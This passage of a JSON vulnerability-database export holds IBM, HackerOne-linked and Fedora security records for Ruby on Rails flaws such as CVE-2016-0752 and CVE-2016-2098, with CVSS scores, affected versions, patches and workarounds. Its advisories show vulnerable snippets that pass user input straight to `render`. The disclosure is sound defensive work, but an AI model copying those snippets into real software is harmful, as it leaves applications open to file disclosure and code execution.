By sending a specially crafted accept header, a remote attacker could exploit this vulnerability to cause a denial of service. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/110105_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/110105>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n**CVEID:** [_CVE-2016-0752_](<https://vulners.com/cve/CVE-2016-0752>)** \nDESCRIPTION:** Ruby on Rails could allow a remote attacker to obtain sensitive information, caused by an error in Action View. By sending a specially crafted request, an attacker could exploit this vulnerability to view portions of files on the system. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/110106_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/110106>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n**CVEID:** [_CVE-2016-0753_](<https://vulners.com/cve/CVE-2016-0753>)** \nDESCRIPTION:** Ruby on Rails could allow a remote attacker to bypass security restrictions, caused by input validation in Active Model. By sending specially crafted data, an attacker could exploit this vulnerability to bypass security restrictions. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/110107_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/110107>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n\n## Affected Products and Versions\n\nIBM License Metric Tool v9 \nIBM BigFix Inventory v9 \nIBM Endpoint Manager for Software Use Analysis v9 & v2.2\n\n## Remediation/Fixes\n\nFor v9, upgrade to version v9.2.4.0. 
\n\nUse the following procedure:\n\n * In IBM Endpoint Manager console, expand **IBM BigFix Inventory **or** IBM License Reporting (ILMT)** node under **Sites** node in the tree panel.\n * Click **Fixlets and Tasks** node. **Fixlets and Tasks** panel will be displayed on the right.\n * In the **Fixlets and Tasks** panel locate _Upgrade to the newest version of IBM BigFix Inventory 9.x _or _Upgrade to the newest version IBM License Metric Tool 9.x_ fixlet and run it against the computer that hosts your server.\n \nNote: In an airgapped environment, you have to run BESAirgapTool and BESDownloadCacher first in order to update your site. \n\nFor v2.2, upgrade to IBM BigFix Inventory 9.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-26T21:17:25", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Ruby on Rails affect IBM License Metric Tool v9, IBM BigFix Inventory v9 and IBM Endpoint Manager for Software Use Analysis v9 & v2.2", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2015-7577", "CVE-2015-7581", "CVE-2016-0751", "CVE-2016-0752", "CVE-2016-0753"], "modified": 
"2021-04-26T21:17:25", "id": "E7183AB173010AD555253E1C8255AC6DD7B1D2F6B9E8F805A55734163D6C20F2", "href": "https://www.ibm.com/support/pages/node/281879", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "hackerone": [{"lastseen": "2023-02-03T01:51:29", "bounty": 1500.0, "description": "# Possible remote code execution vulnerability in Action Pack.\n\nThere is a possible remote code execution vulnerability in Action Pack.\nThis vulnerability has been assigned the CVE identifier CVE-2016-2098.\n\nVersions Affected: 3.2.x, 4.0.x, 4.1.x, 4.2.x\nNot affected: 5.0+\nFixed Versions: 3.2.22.2, 4.1.14.2, 4.2.5.2\n\nImpact\n------\nApplications that pass unverified user input to the `render` method in a\ncontroller or a view may be vulnerable to a code injection.\n\nImpacted code will look like this:\n\n```ruby\nclass TestController < ApplicationController\n def show\n render params[:id]\n end\nend\n```\n\nAn attacker could use the request parameters to coerce the above example\nto execute arbitrary ruby code.\n\nAll users running an affected release should either upgrade or use one of the\nworkarounds immediately.\n\nReleases\n--------\nThe FIXED releases are available at the normal locations.\n\nWorkarounds\n-----------\nA workaround to this issue is to not pass arbitrary user input to the `render`\nmethod. Instead, verify that data before passing it to the `render` method.\n\nFor example, change this:\n\n```ruby\ndef show\n render params[:id]\nend\n```\n\nTo this:\n\n```ruby\ndef show\n render verify_id(params[:id])\nend\n\nprivate\ndef verify_id(id)\n # add verification logic particular to your application here\nend\n```\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately we have provided a patch for\nit. 
It is in git-am format and consists of a single changeset.\n\n* 3-2-secure_inline_with_params.patch - Patch for 3.2 series\n* 4-1-secure_inline_with_params.patch - Patch for 4.1 series\n* 4-2-secure_inline_with_params.patch - Patch for 4.2 series\n\nCredits\n-------\nThanks to both Tobias Kraze from makandra and joernchen of Phenoelit for reporting this!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-01T19:18:59", "type": "hackerone", "title": "Ruby on Rails: Remote code execution using render :inline", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752", "CVE-2016-2098"], "modified": "2016-03-01T08:06:35", "id": "H1:113928", "href": "https://hackerone.com/reports/113928", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-03T01:51:29", "bounty": 1500.0, "description": "# Possible Information Leak Vulnerability in Action View.\n\nThere is a possible directory traversal and information leak vulnerability in\nAction View. This was meant to be fixed on CVE-2016-0752. However the 3.2 patch was not covering\nall the scenarios. 
This vulnerability has been assigned the CVE identifier\nCVE-2016-2097.\n\nVersions Affected: 3.2.x, 4.0.x, 4.1.x\nNot affected: 4.2+\nFixed Versions: 3.2.22.2, 4.1.14.2\n\nImpact\n------\nApplications that pass unverified user input to the `render` method in a\ncontroller may be vulnerable to an information leak vulnerability.\n\nImpacted code will look something like this:\n\n```ruby\ndef index\n render params[:id]\nend\n```\n\nCarefully crafted requests can cause the above code to render files from\nunexpected places like outside the application's view directory, and can\npossibly escalate this to a remote code execution attack.\n\nAll users running an affected release should either upgrade or use one of the\nworkarounds immediately.\n\nReleases\n--------\nThe FIXED releases are available at the normal locations.\n\nWorkarounds\n-----------\nA workaround to this issue is to not pass arbitrary user input to the `render`\nmethod. Instead, verify that data before passing it to the `render` method.\n\nFor example, change this:\n\n```ruby\ndef index\n render params[:id]\nend\n```\n\nTo this:\n\n```ruby\ndef index\n render verify_template(params[:id])\nend\n\nprivate\ndef verify_template(name)\n # add verification logic particular to your application here\nend\n```\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately we have provided patches for\nit. 
It is in git-am format and consists of a single changeset.\n\n* 3-2-render_data_leak_2.patch - Patch for 3.2 series\n* 4-1-render_data_leak_2.patch - Patch for 4.1 series\n\nCredits\n-------\nThanks to both Jyoti Singh and Tobias Kraze from makandra for reporting this and working with us in the patch!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-01T10:00:34", "type": "hackerone", "title": "Ruby on Rails: Regarding [CVE-2016-0752] Possible Information Leak Vulnerability in Action View", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752", "CVE-2016-2097"], "modified": "2016-03-01T14:50:18", "id": "H1:113831", "href": "https://hackerone.com/reports/113831", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T01:51:30", "bounty": 1500.0, "description": "Timing attack vulnerability in basic authentication in Action Controller.\n\nThere is a timing attack vulnerability in the basic authentication support\nin Action Controller. 
This vulnerability has been assigned the CVE\nidentifier CVE-2015-7576.\n\nVersions Affected: All.\nNot affected: None.\nFixed Versions: 5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, 3.2.22.1\n\nImpact\n------\nDue to the way that Action Controller compares user names and passwords in\nbasic authentication authorization code, it is possible for an attacker to\nanalyze the time taken by a response and intuit the password.\n\nFor example, this string comparison:\n\n \"foo\" == \"bar\"\n\nis possibly faster than this comparison:\n\n \"foo\" == \"fo1\"\n\nAttackers can use this information to attempt to guess the username and\npassword used in the basic authentication system.\n\nYou can tell your application is vulnerable to this attack by looking for\n`http_basic_authenticate_with` method calls in your application.\n\nAll users running an affected release should either upgrade or use one of\nthe workarounds immediately.\n\nReleases\n--------\nThe FIXED releases are available at the normal locations.\n\nWorkarounds\n-----------\nIf you can't upgrade, please use the following monkey patch in an initializer\nthat is loaded before your application:\n\n```\n$ cat config/initializers/basic_auth_fix.rb\nmodule ActiveSupport\n module SecurityUtils\n def secure_compare(a, b)\n return false unless a.bytesize == b.bytesize\n\n l = a.unpack \"C#{a.bytesize}\"\n\n res = 0\n b.each_byte { |byte| res |= byte ^ l.shift }\n res == 0\n end\n module_function :secure_compare\n\n def variable_size_secure_compare(a, b)\n secure_compare(::Digest::SHA256.hexdigest(a), ::Digest::SHA256.hexdigest(b))\n end\n module_function :variable_size_secure_compare\n end\nend\n\nmodule ActionController\n class Base\n def self.http_basic_authenticate_with(options = {})\n before_action(options.except(:name, :password, :realm)) do\n authenticate_or_request_with_http_basic(options[:realm] || \"Application\") do |name, password|\n # This comparison uses & so that it doesn't short circuit and\n # uses 
`variable_size_secure_compare` so that length information\n # isn't leaked.\n ActiveSupport::SecurityUtils.variable_size_secure_compare(name, options[:name]) &\n ActiveSupport::SecurityUtils.variable_size_secure_compare(password, options[:password])\n end\n end\n end\n end\nend\n```\n\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately we have provided patches for\nthe two supported release series. They are in git-am format and consist of a\nsingle changeset.\n\n* 4-1-basic_auth.patch - Patch for 4.1 series\n* 4-2-basic_auth.patch - Patch for 4.2 series\n* 5-0-basic_auth.patch - Patch for 5.0 series\n\nPlease note that only the 4.1.x and 4.2.x series are supported at present. Users\nof earlier unsupported releases are advised to upgrade as soon as possible as we\ncannot guarantee the continued availability of security fixes for unsupported\nreleases.\n\nCredits\n-------\n\nThank you to Daniel Waterworth for reporting the problem and working with us to\nfix it.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 3.7, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2015-10-19T11:01:33", "type": "hackerone", "title": "Ruby on Rails: http_basic_authenticate_with is susceptible to timing attacks.", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 
2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576"], "modified": "2016-03-13T18:08:12", "id": "H1:94568", "href": "https://hackerone.com/reports/94568", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T01:52:17", "bounty": 500.0, "description": "Possible Information Leak Vulnerability in Action View\n\nThere is a possible directory traversal and information leak vulnerability in\nAction View. This vulnerability has been assigned the CVE identifier\nCVE-2016-0752.\n\nVersions Affected: All.\nNot affected: None.\nFixed Versions: 5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, 3.2.22.1\n\nImpact\n------\nApplications that pass unverified user input to the `render` method in a\ncontroller may be vulnerable to an information leak vulnerability.\n\nImpacted code will look something like this:\n\n```ruby\ndef index\n render params[:id]\nend\n```\n\nCarefully crafted requests can cause the above code to render files from\nunexpected places like outside the application's view directory, and can\npossibly escalate this to a remote code execution attack.\n\nAll users running an affected release should either upgrade or use one of the\nworkarounds immediately.\n\nReleases\n--------\nThe FIXED releases are available at the normal locations.\n\nWorkarounds\n-----------\nA workaround to this issue is to not pass arbitrary user input to the `render`\nmethod. Instead, verify that data before passing it to the `render` method.\n\nFor example, change this:\n\n```ruby\ndef index\n render params[:id]\nend\n```\n\nTo this:\n\n```ruby\ndef index\n render verify_template(params[:id])\nend\n\nprivate\ndef verify_template(name)\n # add verification logic particular to your application here\nend\n```\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately we have provided patches for\nthe two supported release series. 
They are in git-am format and consist of a\nsingle changeset.\n\n* 3-2-render_data_leak.patch - Patch for 3.2 series\n* 4-1-render_data_leak.patch - Patch for 4.1 series\n* 4-2-render_data_leak.patch - Patch for 4.2 series\n* 5-0-render_data_leak.patch - Patch for 5.0 series\n\nPlease note that only the 4.1.x and 4.2.x series are supported at present. Users\nof earlier unsupported releases are advised to upgrade as soon as possible as we\ncannot guarantee the continued availability of security fixes for unsupported\nreleases.\n\nCredits\n-------\nThanks John Poulin for reporting this!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2015-02-01T14:34:27", "type": "hackerone", "title": "Ruby on Rails: Explicit, dynamic render path: Dir. Trav + RCE", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2016-02-12T18:52:10", "id": "H1:46019", "href": "https://hackerone.com/reports/46019", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "description": "Eases web-request routing, handling, and response as a half-way front, half-way page controller. 
Implemented with specific emphasis on enabling easy unit/integration testing that doesn't require a browser. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-02-28T08:31:04", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: rubygem-actionpack-4.2.0-3.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2015-7581", "CVE-2016-0751", "CVE-2016-0752", "CVE-2016-0753"], "modified": "2016-02-28T08:31:04", "id": "FEDORA:2B32A60560AC", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/UTHCEYZLRFTAYCPODZUS4TL4JILNOFKB/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Rich support for attributes, callbacks, validations, observers, serialization, internationalization, and testing. It provides a known set of interfaces for usage in model classes. It also helps building custom ORMs for use outside of the Rails framework. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-02-28T08:31:04", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: rubygem-activemodel-4.2.0-2.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2015-7581", "CVE-2016-0751", "CVE-2016-0752", "CVE-2016-0753"], "modified": "2016-02-28T08:31:04", "id": "FEDORA:4CEEE6059FC3", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ZS3Y73KZJILTVKKQLFAMEF6JD5FBSYDS/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Eases web-request routing, handling, and response as a half-way front, half-way page controller. Implemented with specific emphasis on enabling easy unit/integration testing that doesn't require a browser. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-02-28T12:29:15", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: rubygem-actionpack-4.2.3-4.fc23", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2015-7581", "CVE-2016-0751"], "modified": "2016-02-28T12:29:15", "id": "FEDORA:8EFB06087D79", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/PJFW26KQKBYAOA6RTPA4EJVTM32S2PFW/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Simple, battle-tested conventions and helpers for building web pages. 
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-08-26T10:24:48", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: rubygem-actionview-4.2.5.2-3.fc24", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2016-08-26T10:24:48", "id": "FEDORA:287396078F7C", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/4APXKS7NQ42L26TII23EU4OR5UUM7PGI/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Simple, battle-tested conventions and helpers for building web pages. 
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-08-26T12:50:04", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: rubygem-actionview-4.2.3-6.fc23", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2016-08-26T12:50:04", "id": "FEDORA:CDE8860679E9", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/WHYGEL6GEXD5GMJSM2FCGFAPH4NJAWH3/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Utility library which carries commonly used classes and goodies from the Rails framework ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.7, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-02-28T12:28:58", "type": "fedora", "title": "[SECURITY] Fedora 23 
Update: rubygem-activesupport-4.2.3-3.fc23", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576"], "modified": "2016-02-28T12:28:58", "id": "FEDORA:4E7DE6087A83", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/6A3GDFA4WQCY2JFPUO5BZHUY543JZ467/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Simple, battle-tested conventions and helpers for building web pages. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 7.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.4}, "published": "2016-03-17T20:58:05", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: rubygem-actionview-4.2.3-5.fc23", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": 
"2016-03-17T20:58:05", "id": "FEDORA:23278608B5EB", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/BFNZZACMJHF5CAQQNQ7NFDYXDFZST4NC/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Eases web-request routing, handling, and response as a half-way front, half-way page controller. Implemented with specific emphasis on enabling easy unit/integration testing that doesn't require a browser. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 7.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.4}, "published": "2016-03-17T20:58:04", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: rubygem-actionpack-4.2.3-5.fc23", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, 